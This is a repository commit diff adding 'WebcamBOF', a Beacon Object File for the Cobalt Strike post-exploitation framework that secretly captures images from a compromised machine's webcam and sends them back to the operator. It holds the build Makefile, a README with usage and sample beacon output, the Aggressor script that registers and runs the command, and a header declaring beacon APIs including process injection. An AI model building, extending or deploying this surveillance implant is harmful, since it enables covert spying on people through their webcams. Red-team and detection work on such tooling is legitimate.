CodeXTF2
diff --git a/‎.gitignore‎
Lines changed: 1 addition & 0 deletions b/‎.gitignore‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎Makefile‎
Lines changed: 28 additions & 0 deletions b/‎Makefile‎
Lines changed: 28 additions & 0 deletions
diff --git a/‎README.md‎
Lines changed: 52 additions & 0 deletions b/‎README.md‎
Lines changed: 52 additions & 0 deletions
diff --git a/‎WebcamBOF.x64.obj‎
82.1 KB b/‎WebcamBOF.x64.obj‎
82.1 KB
diff --git a/‎WebcamBOF.x86.obj‎
93.1 KB b/‎WebcamBOF.x86.obj‎
93.1 KB
diff --git a/‎WebcamBOF/WebcamBOF.x64.obj‎
87.7 KB b/‎WebcamBOF/WebcamBOF.x64.obj‎
87.7 KB
diff --git a/‎WebcamBOF/WebcamBOF.x86.obj‎
89.4 KB b/‎WebcamBOF/WebcamBOF.x86.obj‎
89.4 KB
diff --git a/‎WebcamBOF/webcamBOF.cna‎
Lines changed: 31 additions & 0 deletions b/‎WebcamBOF/webcamBOF.cna‎
Lines changed: 31 additions & 0 deletions
diff --git a/‎beacon.h‎
Lines changed: 67 additions & 0 deletions b/‎beacon.h‎
Lines changed: 67 additions & 0 deletions
@@ -0,0 +1 @@
+/.vscode
@@ -0,0 +1,28 @@
+BOFNAME := WebcamBOF
+COMINCLUDE := -I .common
+CC_x64 := x86_64-w64-mingw32-gcc
+CC_x86 := i686-w64-mingw32-gcc
+
+
+EXTRA_FLAGS := -fno-function-sections -fno-inline -fno-common -fno-data-sections -w
+
+all:
+	$(CC_x64) -o $(BOFNAME).x64.obj $(COMINCLUDE) -Os -fno-weak $(EXTRA_FLAGS) -c entry.c -DBOF 
+	$(CC_x86) -o $(BOFNAME).x86.obj $(COMINCLUDE) -Os -fno-weak $(EXTRA_FLAGS) -c entry.c -DBOF 
+	mkdir -p $(BOFNAME)
+	mv $(BOFNAME)*.obj $(BOFNAME)
+
+test:
+	$(CC_x64) entry.c -g $(COMINCLUDE) $(LIBINCLUDE)  -o $(BOFNAME).x64.exe
+	$(CC_x86) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x86.exe
+	mkdir -p $(BOFNAME)
+	mv $(BOFNAME)*.exe $(BOFNAME)
+	
+scanbuild:
+	$(CC) entry.c -o $(BOFNAME).scanbuild.exe $(COMINCLUDE) $(LIBINCLUDE)
+
+check:
+	ccheck --enable=all $(COMINCLUDE) --platform=win64 entry.c
+
+clean:
+	rm $(BOFNAME).*.exe
@@ -0,0 +1,52 @@
+# WebcamBOF
+
+Webcam capture capability for Cobalt Strike, implemented as a Beacon Object File (BOF)
+
+## Self Compilation
+1. git clone the repo
+2. run `make`
+
+## Save methods:  
+0. drop file to disk
+1. download file over beacon (Cobalt Strike only)
+2. download file over beacon as a screenshot (Cobalt Strike only)
+
+## Usage
+1. import the webcamBOF.cna script into Cobalt Strike
+2. use the command webcam_bof {filename} {save method 0/1/2}
+  
+```
+beacon> webcam_bof sad.jpeg 2
+[*] Running Webcam BOF by (@codex_tf2)
+[+] host called home, sent: 35817 bytes
+[+] received output:
+
+[*] Initializing webcam
+[+] received output:
+
+[*] Device 0: HP 320 FHD Webcam
+[+] received output:
+
+[*] Capturing image data
+[+] received output:
+[*] Downloading JPEG over beacon as a screenshot
+[*] received screenshot of Webcam from Admin (328kb)
+```
+
+
+## Notes
+I'm gonna be honest, the code quality of this is pretty low. There is some hacky shit going on to prevent generation of COMDAT sections during compilation (the mfapi.h headers produced over 170 of them) and I did some absolutely illegal stuff with the function pointers in one of the functions becuase for some reason the addresses would get truncated ONLY when run in Beacon. It would work perfectly fine in COFFLoader. No idea why.
+
+But it works.
+
+## Why did I make this?
+Cobalt Strike did not originally have a built in webcam capability, nor did open source alternatives exist to my knowledge. And it was a fun (not) idea.
+
+## Credits
+- Webcam code from https://github.com/OV2/WebcamImage
+- Save BMP to file from https://stackoverflow.com/a/60667564
+- in memory download from https://github.com/anthemtotheego/CredBandit
+- bitmap to jpeg from https://github.com/WKL-Sec/HiddenDesktop
+
+## Disclaimer
+usual disclaimer here, I am not responsible for any crimes against humanity you may commit or nuclear war you may cause using this piece of poorly written code.
@@ -0,0 +1,31 @@
+
+#Register command
+beacon_command_register(
+    "webcam_bof",
+    "Webcam capability for Cobalt Strike",
+    "Use: webcam_bof [filename] [save method]\nSave methods:\n\t0: drop file to disk\n\t1: download over beacon as a file\n\t2: download over beacon\n\nTake a Webcam inline using a BOF. Image is saved as JPEG on disk or downloaded over beacon."
+);
+
+alias webcam_bof {
+    local('$bid $barch $handle $data $args $target_pid');
+    $bid = $1;
+    # figure out the arch of this session
+    $barch  = barch($bid);
+    if (size(@_) != 3)
+    {
+        berror($1, "Syntax: webcam_bof [filename] [save method 0/1/2] e.g. webcam_bof file.jpeg 2");
+                return;
+    }
+    # read in the right BOF file
+    $handle = openf(script_resource("WebcamBOF. $+ $barch $+ .obj"));
+    $data = readb($handle, -1);
+    closef($handle);
+    
+
+    $args   = bof_pack($bid, "zi", $2, $3);
+
+    # announce what we're doing
+    btask($bid, "Running Webcam BOF by (@codex_tf2)", "T1125");
+    # execute it.
+    beacon_inline_execute($bid, $data, "go", $args);
+}
@@ -0,0 +1,67 @@
+#pragma once
+
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Cobalt Strike 4.1.
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_ERROR       0x0d
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_FILE		 0x02
+#define CALLBACK_FILE_WRITE  0x08
+#define CALLBACK_FILE_CLOSE  0x09
+#define CALLBACK_SCREENSHOT  0x03
+
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);